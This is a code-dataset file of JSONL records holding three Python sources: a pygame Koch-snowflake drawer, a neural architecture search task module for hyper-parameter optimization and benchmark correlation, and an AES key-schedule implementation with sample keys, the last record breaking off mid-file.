+{"seq_id":"3115351755","text":"import pygame as pg\r\nfrom time import perf_counter\r\nfrom shapely.geometry import Point, Polygon\r\n\r\n# Variables\r\nSQRT_3 = 3 ** (1 / 2)\r\nWHITE = (255, 255, 255)\r\nA = [(100, 600), (700, 600), (400, 80)]\r\ntriangles = A.copy()\r\n\r\n# Initialization\r\npg.init()\r\nscreen = pg.display.set_mode((800, 800))\r\n\r\n# Functions\r\ndistance = lambda x, y: ((x[0] - y[0]) ** 2 + (x[1] - y[1]) ** 2) ** 0.5\r\n\r\n\r\ndef generatePoints(pt1, pt2, reference):\r\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\r\n a = pt1[0] + (pt2[0] - pt1[0]) / 3\r\n b = pt1[1] + (pt2[1] - pt1[1]) / 3\r\n c = pt1[0] + (pt2[0] - pt1[0]) * 2 / 3\r\n d = pt1[1] + (pt2[1] - pt1[1]) * 2 / 3\r\n ptm = (pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2\r\n dis = distance((a, b), (c, d))\r\n h = SQRT_3/2 * dis\r\n if slope == 0:\r\n ptc1 = ptm[0], ptm[1] - h\r\n ptc2 = ptm[0], ptm[1] + h\r\n ptc = ptc1 if distance(reference, ptc1) > distance(ptc2, reference) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n perp = -1 / slope\r\n x_c = h / (perp ** 2 + 1) ** 0.5\r\n y_c = perp * x_c\r\n ptc1 = round(ptm[0] - x_c), round(ptm[1] - y_c)\r\n ptc2 = round(ptm[0] + x_c), round(ptm[1] + y_c)\r\n ptc = ptc1 if distance(reference, ptc1) > distance(ptc2, reference) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n\r\n\r\ndef generatePoints_2(pt1, pt2, father: Polygon):\r\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\r\n a = pt1[0] + (pt2[0] - pt1[0]) / 3\r\n b = pt1[1] + (pt2[1] - pt1[1]) / 3\r\n c = pt1[0] + (pt2[0] - pt1[0]) * 2 / 3\r\n d = pt1[1] + (pt2[1] - pt1[1]) * 2 / 3\r\n ptm = (pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2\r\n dis = distance((a, b), (c, d))\r\n h = SQRT_3/2 * dis\r\n if slope == 0:\r\n ptc1 = ptm[0], ptm[1] - h\r\n ptc2 = ptm[0], ptm[1] + h\r\n ptc = ptc1 if father.contains(Point(*ptc2)) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n perp = -1 / slope\r\n x_c = h / (perp ** 2 + 1) ** 0.5\r\n y_c = perp * x_c\r\n ptc1 = round(ptm[0] - x_c), round(ptm[1] - y_c)\r\n ptc2 = round(ptm[0] + x_c), round(ptm[1] + y_c)\r\n ptc = ptc1 if father.contains(Point(*ptc2)) else ptc2\r\n return (round(a), round(b)), (round(c), round(d)), ptc\r\n\r\n\r\ndef next(arr):\r\n array = arr.copy()\r\n org = arr.copy()\r\n for j in range(len(org)):\r\n pt1 = org[j]\r\n pt2 = org[(j + 1) % (len(org))]\r\n ref = None\r\n for triangle in triangles:\r\n if pt1 in triangle and pt2 in triangle:\r\n b = triangle.copy()\r\n b.remove(pt1)\r\n b.remove(pt2)\r\n ref = b[0]\r\n if ref == None:\r\n pta, ptb, ptc = generatePoints_2(pt1, pt2, Polygon(array))\r\n else:\r\n pta, ptb, ptc = generatePoints(pt1, pt2, ref)\r\n index = array.index(pt2)\r\n array.insert(index, ptb)\r\n array.insert(index, ptc)\r\n array.insert(index, pta)\r\n triangles.append([pta, ptb, ptc])\r\n return array\r\n\r\n\r\ndef genRec(level):\r\n if level == 0:\r\n return A\r\n else:\r\n return next(genRec(level - 1))\r\n\r\nstart = perf_counter()\r\nA = genRec(4)\r\n\r\n# Game Loop\r\nwhile True:\r\n pg.draw.polygon(screen, WHITE, A)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n quit(0)\r\n pg.display.update()\r\n print(perf_counter() - start)\r\n","repo_name":"tejaDhulipala/SnowflakeGen","sub_path":"AlgorithmA.py","file_name":"AlgorithmA.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37798995807","text":"import os\nimport shutil\nfrom collections import defaultdict\nfrom copy import deepcopy\nimport numpy as np\nfrom uninas.tasks.abstract import AbstractTask, AbstractNetTask\nfrom uninas.models.networks.uninas.search import SearchUninasNetwork\nfrom uninas.methods.strategy_manager import StrategyManager\nfrom uninas.optimization.task import common_s2_net_args_to_add, common_s2_extend_args, common_s2_prepare_run\nfrom uninas.optimization.benchmarks.mini.benchmark import MiniNASBenchmark, MiniResult\nfrom uninas.optimization.benchmarks.mini.tabular import MiniNASTabularBenchmark, explore\nfrom uninas.optimization.benchmarks.mini.tabular_search import MiniNASSearchTabularBenchmark\nfrom uninas.optimization.hpo.uninas.algorithms.abstract import AbstractHPO\nfrom uninas.optimization.hpo.uninas.algorithms.randomly import RandomlyEval\nfrom uninas.optimization.hpo.uninas.values import DiscreteValues, ValueSpace, SpecificValueSpace\nfrom uninas.utils.paths import replace_standard_paths\nfrom uninas.utils.misc import split\nfrom uninas.utils.args import MetaArgument, Argument, Namespace, find_in_args\nfrom uninas.utils.loggers.python import log_headline, Logger\nfrom uninas.register import Register\nfrom uninas.builder import Builder\n\n\nclass SelfHPOUtils:\n \"\"\"\n shared parts\n \"\"\"\n\n @staticmethod\n def prepare(cls: AbstractTask.__class__, logger: Logger, estimator_kwargs: dict, args: Namespace, index=None)\\\n -> (AbstractHPO, [], []):\n \"\"\"\n :param cls:\n :param logger:\n :param estimator_kwargs:\n :param args: global namespace\n :param index: index of the task\n :return: hpo class, constraints, objectives\n \"\"\"\n\n # hp optimizer\n try:\n hpo = cls._parsed_meta_argument(Register.hpo_self_algorithms, 'cls_hpo_self_algorithm', args, index=index)\n assert issubclass(hpo, AbstractHPO), 'Method must have class methods to optimize the arc'\n except:\n hpo = None\n\n # estimators\n log_headline(logger, 'adding network estimators')\n constraints, objectives = [], []\n for i, e in enumerate(cls._parsed_meta_arguments(Register.hpo_estimators, 'cls_hpo_estimators', args, index=index)):\n estimator = e(args=args, index=i, **estimator_kwargs)\n if estimator.is_constraint():\n constraints.append(estimator)\n if estimator.is_objective():\n objectives.append(estimator)\n logger.info(estimator.str())\n return hpo, constraints, objectives\n\n @classmethod\n def meta_args_to_add(cls, estimator_filter: dict = None, algorithm=True) -> [MetaArgument]:\n estimators = Register.hpo_estimators\n if isinstance(estimator_filter, dict):\n estimators = estimators.filter_match_all(**estimator_filter)\n meta = [MetaArgument('cls_hpo_estimators', estimators, help_name='estimator', allow_duplicates=True, allowed_num=(1, -1))]\n if algorithm:\n meta.append(MetaArgument('cls_hpo_self_algorithm', Register.hpo_self_algorithms, help_name='hyper-parameter optimizer', allowed_num=1))\n return meta\n\n @staticmethod\n def mask_architecture_space(args: Namespace, space: ValueSpace) -> ValueSpace:\n _, mask = find_in_args(args, \".mask_indices\")\n for i in split(mask, int):\n space.remove_value(i)\n return space\n\n @staticmethod\n def bench_subspace(args: Namespace, bench: MiniNASTabularBenchmark) -> MiniNASTabularBenchmark:\n _, mask = find_in_args(args, \".mask_indices\")\n masked = [i for i in split(mask, int)]\n return bench.subset(blacklist=masked)\n\n\n@Register.task(search=True)\nclass MiniBenchHPOTask(AbstractTask):\n \"\"\"\n A hyper-parameter optimization task without networks/methods, purely on a given mini-bench\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n benchmark_set = self._parsed_meta_argument(Register.benchmark_sets, 'cls_benchmark', args, index=None)\n self.benchmark_set = benchmark_set.from_args(args, index=None)\n self.plot_true_pareto = self._parsed_argument('plot_true_pareto', args)\n\n estimator_kwargs = dict(mini_api=self.benchmark_set)\n self.hpo, self.constraints, self.objectives = SelfHPOUtils.prepare(self, self.logger, estimator_kwargs, args)\n\n @classmethod\n def meta_args_to_add(cls) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True)\n return super().meta_args_to_add() + [\n MetaArgument('cls_benchmark', benchmark_sets, allowed_num=1, help_name='mini benchmark set to optimize on'),\n ] + SelfHPOUtils.meta_args_to_add(algorithm=True, estimator_filter=dict(requires_bench=True))\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('plot_true_pareto', default='False', type=str, help='add the true pareto front', is_bool=True),\n Argument('mask_indices', default=\"\", type=str, help='[int] mask specific primitives from being used'),\n ]\n\n def _run(self):\n file_viz = '%s/%s.pdf' % (self.checkpoint_dir(self.save_dir), self.hpo.__name__)\n space = SelfHPOUtils.bench_subspace(self.args, self.benchmark_set).get_value_space()\n algorithm = self.hpo.run_opt(hparams=self.args, logger=self.logger,\n checkpoint_dir=self.checkpoint_dir(self.save_dir),\n value_space=space,\n constraints=self.constraints, objectives=self.objectives)\n population = algorithm.get_total_population(sort=True)\n population.plot(self.objectives[0].key, self.objectives[1].key, show=False, save_path=file_viz, num_fronts=-1)\n\n if self.plot_true_pareto and not self.hpo.is_full_eval():\n log_headline(self.logger, 'Starting a full evaluation to get the true pareto front')\n full = RandomlyEval(\n value_space=space,\n logger=self.logger,\n save_file='%s/%s.pickle' % (self.checkpoint_dir(self.save_dir), RandomlyEval.__name__),\n constraints=self.constraints,\n objectives=self.objectives,\n num_eval=-1)\n full.search(load=True)\n population.add_other_pareto_to_plot(full.population, self.objectives[0].key, self.objectives[1].key,\n show=False, save_path=file_viz)\n return algorithm, population\n\n\n@Register.task(search=True)\nclass NetHPOTask(AbstractNetTask):\n \"\"\"\n An s2 task (trying to figure out the optimal network architecture of a trained s1 network)\n the chosen method contains the exact optimization approach\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n AbstractNetTask.__init__(self, args, *args_, **kwargs)\n\n # args\n self.reset_bn = self._parsed_argument('reset_bn', args)\n self.s1_path = replace_standard_paths(self._parsed_argument('s1_path', args))\n\n # files\n self.tmp_load_path = '%s/checkpoint.tmp.pt' % self.save_dir\n os.makedirs(os.path.dirname(self.tmp_load_path), exist_ok=True)\n shutil.copyfile('%s/data.meta.pt' % self.s1_path, '%s/data.meta.pt' % self.save_dir)\n\n # one method, one trainer... could be executed in parallel in future?\n log_headline(self.logger, 'setting up...')\n self.add_method()\n self.add_trainer(method=self.get_method(), save_dir=self.save_dir, num_devices=-1)\n self.log_detailed()\n self.get_method().get_network().set_forward_strategy(False)\n\n # algorithms\n estimator_kwargs = dict(trainer=self.trainer[0], load_path=self.tmp_load_path)\n self.hpo, self.constraints, self.objectives = SelfHPOUtils.prepare(self, self.logger, estimator_kwargs, args)\n\n # arc space\n space = ValueSpace(*[DiscreteValues.interval(0, n) for n in self.get_method().strategy_manager.get_num_choices(unique=True)])\n self._architecture_space = SelfHPOUtils.mask_architecture_space(self.args, space)\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + common_s2_net_args_to_add()\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n return super().meta_args_to_add() + SelfHPOUtils.meta_args_to_add(algorithm=algorithm, estimator_filter=dict(requires_bench=False))\n\n @classmethod\n def extend_args(cls, args_list: [str]):\n \"\"\"\n allow modifying the arguments list before other classes' arguments are dynamically added\n this should be used sparsely, as it is hard to keep track of\n \"\"\"\n common_s2_extend_args(cls, args_list)\n\n def _run(self, save=True):\n common_s2_prepare_run(self.logger, self.trainer, self.s1_path, self.tmp_load_path, self.reset_bn, self.methods)\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n candidate_dir = '%s/candidates/' % checkpoint_dir\n file_viz = '%sx.pdf' % checkpoint_dir\n self.get_method().eval()\n\n # run\n algorithm = self.hpo.run_opt(hparams=self.args, logger=self.logger, checkpoint_dir=checkpoint_dir,\n value_space=self._architecture_space,\n constraints=self.constraints, objectives=self.objectives)\n population = algorithm.get_total_population(sort=True)\n\n # save results\n if save:\n population.plot(self.objectives[0].key, self.objectives[1].key, show=False, save_path=file_viz)\n for candidate in population.fronts[0]:\n self.get_method().get_network().forward_strategy(fixed_arc=candidate.values)\n Builder.save_config(self.get_method().get_network().config(finalize=True),\n candidate_dir, 'candidate-%s' % '-'.join([str(g) for g in candidate.values]))\n return algorithm, population\n\n\n@Register.task(search=True)\nclass EvalBenchTask(AbstractTask):\n \"\"\"\n Correlating two or more benches with each other\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n AbstractTask.__init__(self, args, *args_, **kwargs)\n\n # benchmarks\n self.same_dataset = self._parsed_argument(\"same_dataset\", args, index=None)\n benchmark_sets = self._parsed_meta_arguments(Register.benchmark_sets, 'cls_benchmarks', args, index=None)\n self.benchmark_sets = [bs.from_args(args, index=i) for i, bs in enumerate(benchmark_sets)]\n\n # correlations\n self.correlation_cls = []\n for name in self._parsed_argument('measure_correlations', self.args, split_=True):\n self.correlation_cls.append(Register.nas_metrics.get(name))\n\n @classmethod\n def meta_args_to_add(cls) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add() + [\n MetaArgument('cls_benchmarks', benchmark_sets, allowed_num=(2, -1), allow_duplicates=True,\n help_name='mini benchmark sets to correlate with each other'),\n ] + SelfHPOUtils.meta_args_to_add(algorithm=True, estimator_filter=dict(requires_bench=True))\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('same_dataset', default='False', type=str, is_bool=True,\n help=\"correlate only if the bench results are on the same dataset\"),\n Argument('measure_correlations', default='KendallTauNasMetric', type=str, help='correlations to measure'),\n ]\n\n def _run(self):\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n file_plot = '%s/plots/%s-%s/%s/%s_%s.pdf' % (checkpoint_dir, '%d', '%d', '%s', '%s', '%s')\n\n # figure out what each bench has\n data_sets = []\n architectures = []\n for bs in self.benchmark_sets:\n assert isinstance(bs, MiniNASTabularBenchmark)\n data_sets.append(set(bs.get_all_datasets()))\n architectures.append(set(bs.get_all_architecture_tuples()))\n\n # plot all set intersections\n for i0 in range(len(self.benchmark_sets)-1):\n for i1 in range(i0+1, len(self.benchmark_sets)):\n log_headline(self.logger, \"correlating i0=%d and i1=%d\" % (i0, i1), target_len=80)\n bench0, bench1 = self.benchmark_sets[i0], self.benchmark_sets[i1]\n\n self.logger.info(\"bench[%d]: %s\" % (i0, bench0.get_name()))\n self.logger.info(\"bench[%d]: %s\" % (i1, bench1.get_name()))\n\n # intersection of evaluated architectures\n arc0, arc1 = architectures[i0], architectures[i1]\n arc = list(arc0.intersection(arc1))\n self.logger.info(\"num architectures: num bench[%d] = %d, num bench[%d] = %d, num intersection = %d\"\n % (i0, len(arc0), i1, len(arc1), len(arc)))\n if len(arc) == 0:\n self.logger.info(\"skipping, can not correlate any architectures\")\n continue\n\n # intersection of evaluated data sets\n ds0, ds1 = data_sets[i0], data_sets[i1]\n ds, used_ds = list(ds0.intersection(ds1)), []\n if self.same_dataset:\n used_ds = [(d, d) for d in ds]\n else:\n for ds0_ in ds0:\n for ds1_ in ds1:\n used_ds.append((ds0_, ds1_))\n self.logger.info(\"data sets: bench[%d] = %s, bench[%d] = %s, intersection = %s, used combinations = %s\"\n % (i0, ds0, i1, ds1, ds, used_ds))\n if len(used_ds) == 0:\n self.logger.info(\"skipping, can not correlate any architectures\")\n continue\n\n # get all relevant results\n results0, results1 = [], []\n for arc_ in arc:\n results0.append(bench0.get_by_arch_tuple(arc_))\n results1.append(bench1.get_by_arch_tuple(arc_))\n\n # correlate\n for ds0_, ds1_ in used_ds:\n for key in MiniResult.get_metric_keys():\n name = 'all'\n ds_str = ds0_ if ds0_ == ds1_ else \"%s-%s\" % (ds0_, ds1_)\n\n type0 = self.benchmark_sets[i0].default_result_type\n type1 = self.benchmark_sets[i1].default_result_type\n values0 = [r.get(key, data_set=ds0_, result_type=type0) for r in results0]\n values1 = [r.get(key, data_set=ds1_, result_type=type1) for r in results1]\n\n values0 = np.nan_to_num(values0, nan=-1)\n values1 = np.nan_to_num(values1, nan=-1)\n\n self.correlation_cls[0].plot_correlations(\n values0, values1, self.correlation_cls,\n axes_names=('%s %s' % (bench0.get_name(), type0), '%s %s' % (bench1.get_name(), type1)),\n show=False, save_path=file_plot % (i0, i1, name, key, ds_str))\n\n\n@Register.task(search=True)\nclass EvalNetBenchTask(NetHPOTask):\n \"\"\"\n Evaluate a trained super-network network on a bench\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n\n # restrictions\n assert len(self.objectives) == 1\n\n # bench part\n benchmark_set = self._parsed_meta_argument(Register.benchmark_sets, 'cls_benchmark', args, index=None)\n benchmark_set = benchmark_set.from_args(args, index=None)\n self.benchmark_set = SelfHPOUtils.bench_subspace(args, benchmark_set)\n assert isinstance(self.benchmark_set, MiniNASBenchmark)\n self.measure_top = self._parsed_argument('measure_top', self.args)\n # check if the cell architecture was shared during training\n self.num_normal = 1\n _, arc_shared = find_in_args(self.args, '.arc_shared')\n if not arc_shared:\n _, cell_order = find_in_args(self.args, '.cell_order')\n self.num_normal = cell_order.count('n')\n\n # nas metrics\n self.nas_cls = []\n for name in self._parsed_argument('nas_metrics', self.args, split_=True):\n self.nas_cls.append(Register.nas_metrics.get(name))\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add(algorithm=algorithm) + [\n MetaArgument('cls_benchmark', benchmark_sets, allowed_num=1, help_name='mini benchmark set to optimize on'),\n ]\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('measure_top', default=500, type=int, help='measure top-N bench architectures'),\n Argument('nas_metrics', default='ImprovementNasMetric, KendallTauNasMetric', type=str, help='metrics to calculate'),\n ]\n\n def _run(self, save=False):\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n\n # what are the best architectures in a surrogate benchmark...?\n if (self.measure_top > 0) and (not self.benchmark_set.is_tabular()):\n raise NotImplementedError(\"can not measure top-N networks on a non-tabular benchmark\")\n\n # value space, already sorted by best\n sm = StrategyManager()\n svs = [v.arch_tuple for v in self.benchmark_set.get_all_sorted(['acc1'], [True])]\n arc_len = len(svs[0])\n if (self.num_normal > 1) and (len(svs)*self.num_normal == sm.get_num_choices(unique=True)):\n # compensate now for late architecture sharing by duplicating the indices\n svs = [tuple(list(v)*self.num_normal) for v in svs]\n self._svs = SpecificValueSpace(svs)\n\n # run\n algorithm, name_num = None, [(str(self.measure_top), self.measure_top), ('random', 9999999999)]\n for name, num in name_num:\n if algorithm is not None:\n algorithm.remove_saved_state()\n\n # tweak self params and let the super class run\n self._architecture_space = deepcopy(self._svs)\n self._architecture_space.specific_values = self._architecture_space.specific_values[:num]\n algorithm, population = super()._run(save=save)\n\n # compare, objective key\n obj_key = self.objectives[0].key\n net_values = []\n bench_values = defaultdict(list)\n for candidate in population.candidates:\n net_values.append(candidate.metrics.get(obj_key))\n r = self.benchmark_set.get_by_arch_tuple(candidate.values[:arc_len])\n for ds in r.get_data_sets():\n bench_values[ds].append(r.get(kind=obj_key, data_set=ds))\n\n # plots, logging\n self.get_method().log_metrics({\n 'net_bench/%s/num' % name: population.size\n })\n for ben_ds, ben_values in bench_values.items():\n for nas_cls in self.nas_cls:\n # calculate metric\n metric_dct = nas_cls.get_data(net_values, ben_values)\n\n # plot\n file_plot = '%s/plots/metrics/%s/%s/%s_%s.pdf' %\\\n (checkpoint_dir, name, ben_ds, obj_key, nas_cls.__name__)\n nas_cls.plot(data=metric_dct, title='', legend=True, show=False, save_path=file_plot)\n\n # log\n for k, v in metric_dct.items():\n self.get_method().log_metric_lists({\n 'net_bench/%s/%s/%s/%s/%s' % (name, ben_ds, obj_key, nas_cls.__name__, k): v\n })\n\n\n@Register.task(search=True)\nclass CreateSearchNetBenchTask(NetHPOTask):\n \"\"\"\n Evaluate a s1 network and create a bench from the results\n this is an intermediate step to compare the prediction of several search network\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n\n for key in MiniResult.get_metric_keys():\n if not any([o.key == key for o in self.objectives + self.constraints]):\n self.logger.warning('Will not evaluate key \"%s\" on the network (not an objective/constraint)' % key)\n\n self.measure_min = self._parsed_argument('measure_min', args, index=None)\n benchmark_sets = self._parsed_meta_arguments(Register.benchmark_sets, 'cls_benchmarks', args, index=None)\n self.benchmark_sets = [bs.from_args(args, index=i) for i, bs in enumerate(benchmark_sets)]\n for bs in self.benchmark_sets:\n assert isinstance(bs, MiniNASTabularBenchmark)\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add(algorithm=algorithm) + [\n MetaArgument('cls_benchmarks', benchmark_sets,\n help_name='optional benchmark sets, to evaluate specific architectures'),\n ]\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('measure_min', default=-1, type=int,\n help='min amount of architectures to generate (but the hpo algorithm may evaluate less)'),\n ]\n\n def _run(self, save=False):\n # value spaces\n values = set()\n sm = StrategyManager()\n\n # add all evaluated architectures of the benchmarks\n for bs in self.benchmark_sets:\n assert isinstance(bs, MiniNASTabularBenchmark)\n l0, l1 = len(sm.ordered_names(unique=True)), bs.get_value_space().num_choices()\n assert l0 == l1, \"Num choices of the network space (%d) and the bench space (%d) must match\" % (l0, l1)\n for r in bs.get_all():\n values.add(r.arch_tuple)\n if len(values) > 0:\n self.logger.info(\"Added %d architectures from given benchmark set(s) to the list\" % len(values))\n\n # if the space is smaller than desired, add random architectures\n network = self.get_method().get_network()\n assert isinstance(network, SearchUninasNetwork)\n net_space = sm.get_value_space()\n if self.measure_min > len(values):\n self.logger.info(\"Adding random architectures, have %d/%d\" % (len(values), self.measure_min))\n while len(values) < self.measure_min:\n values.add(net_space.random_sample())\n\n # evaluate the given architectures\n self._architecture_space = SpecificValueSpace(list(values))\n algorithm, population = super()._run(save=save)\n\n # add info to the candidates, e.g. from profilers, such as loss/flops/latency/macs\n pass\n\n # create a new bench\n bench = MiniNASSearchTabularBenchmark.make_from_population(population, self.get_method())\n log_headline(self.logger, \"Created bench file from super-network\")\n bench.print_info(self.logger.info)\n bench.save_in_dir(self.save_dir)\n explore(bench, self.logger, n=10)\n","repo_name":"cogsys-tuebingen/uninas","sub_path":"uninas/tasks/hpo_self.py","file_name":"hpo_self.py","file_ext":"py","file_size_in_byte":25004,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"69876971307","text":"import sys\n# from BitVector import *\nfrom Python.ModGen.mod_gen import mod_gen\n# from AES.gen_table import gen_subbytes_table, gen_inv_subbytes_table\nfrom Utils.utils import *\n\n\n# AES_modulus = BitVector(bitstring = '100011011')\n\nbyte_sub_table = gen_subbytes_table()\n\n\ndef get_round_keys(key: bytes):\n key_words = []\n len1 = len(key)\n num_rounds = None\n if len1 == 16:\n key_words = gen_key_schedule_128(key)\n if len1 == 24:\n key_words = gen_key_schedule_192(key)\n if len1 == 32:\n key_words = gen_key_schedule_256(key)\n key_schedule = []\n for word_index, word in enumerate(key_words):\n keyword_in_ints = []\n for i in range(4):\n keyword_in_ints.append(word[i])\n key_schedule.append(keyword_in_ints)\n return key_schedule\n\n\ndef get_round_keys_verbose(key: bytes):\n key_words = []\n len1 = len(key)\n num_rounds = None\n if len1 == 16:\n key_words = gen_key_schedule_128(key)\n num_rounds = 10\n if len1 == 24:\n key_words = gen_key_schedule_192(key)\n num_rounds = 12\n if len1 == 32:\n key_words = gen_key_schedule_256(key)\n num_rounds = 14\n key_schedule = []\n print(\"\\nEach 32-bit word of the key schedule is shown as a sequence of 4 one-byte integers:\")\n for word_index, word in enumerate(key_words):\n keyword_in_ints = []\n for i in range(4):\n keyword_in_ints.append(word[i])\n if word_index % 4 == 0:\n print(\"\\n\")\n print(\"word %d: %s\" % (word_index, str(keyword_in_ints)))\n key_schedule.append(keyword_in_ints)\n\n round_keys = [None for i in range(num_rounds + 1)]\n for i in range(num_rounds + 1):\n round_keys[i] = (show_hex_2(key_words[i * 4]) + show_hex_2(key_words[i * 4 + 1]) +\n show_hex_2(key_words[i * 4 + 2]) + show_hex_2(key_words[i * 4 + 3]))\n print(\"\\n\\nRound keys in hex (first key for input block):\\n\")\n for round_key in round_keys:\n print(round_key)\n return key_schedule\n\n\ndef gen_key_schedule_128(key):\n key_words = [None for i in range(44)]\n round_constant = 0x01\n for i in range(4):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(4, 44):\n if i % 4 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 4], bytes(kwd))\n # print(round_constant)\n else:\n key_words[i] = xor_bytes(key_words[i - 4], key_words[i - 1])\n return key_words\n\n\ndef gen_key_schedule_192(key):\n key_words = [None for i in range(52)]\n round_constant = 0x01\n for i in range(6):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(6, 52):\n if i % 6 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 6], bytes(kwd))\n else:\n key_words[i] = xor_bytes(key_words[i - 6], key_words[i - 1])\n return key_words\n\n\ndef gen_key_schedule_256(key):\n key_words = [None for i in range(60)]\n round_constant = 0x01\n for i in range(8):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(8, 60):\n if i % 8 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 8], bytes(kwd))\n elif (i - (i // 8) * 8) < 4:\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i - 1])\n elif (i - (i // 8) * 8) == 4:\n key_words[i] = []\n for j in range(4):\n key_words[i].append(byte_sub_table[int(key_words[i - 1][j])])\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i])\n elif (i - (i // 8) * 8) > 4 and ((i - (i // 8) * 8) < 8):\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i - 1])\n else:\n sys.exit(\"error in key scheduling algo for i = %d\" % i)\n return key_words\n\n\ndef gee(word, round_constant=0x01):\n rotated_word = rot_word(word)\n new_word = [0x00] * 4\n for i in range(4):\n new_word[i] = byte_sub_table[int(rotated_word[i])]\n new_word[0] ^= round_constant\n round_constant = gf_modular_mul(round_constant, 0x02)\n return new_word, round_constant\n\n\ndef rot_word(word: bytes):\n word2 = bytearray(word)\n w3 = word2.pop(0)\n word2.insert(3, w3)\n return word2\n\n\ndef show_hex_2(data):\n if type(data) == type(b'0'):\n return ''.join([format(data[i], '02x') for i in range(len(data))])\n return format(data, '02x')\n\n\ndef r_con(word):\n \"\"\"\n round Constant\n :param word:\n :return:\n \"\"\"\n\n\ndef set_key(key, keysize=128):\n return key + '0' * (keysize // 8 - len(key)) if len(key) < keysize // 8 else key[:keysize // 8]\n\n\nif __name__ == '__main__':\n key = b'\\x02L\\x1e\\x9e\\xe7\\x13\\x0c\\xac\\xf8j\\xd7\\xbe`\\x87\\xe9\\xd7'\n # get_round_keys(key)\n key2 = 'hello'\n key2 = set_key(key2, 128)\n key3 = bytes(key2, 'ascii')\n k = get_round_keys_verbose(key3)\n k2 = bytes([0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c])\n key4 = int_to_bytes(0x2b7e151628aed2a6abf7158809cf4f3c, 16)\n\n key5 = set_key(key2, 256)\n key6 = bytes(key5, 'ascii')\n k3 = get_round_keys_verbose(key6)\n # for i in range(16):\n # print(key4[i])\n k4 = bytes([0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b])\n k6 = bytes([0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4])\n get_round_keys_verbose(k2)\n get_round_keys_verbose(k4)\n 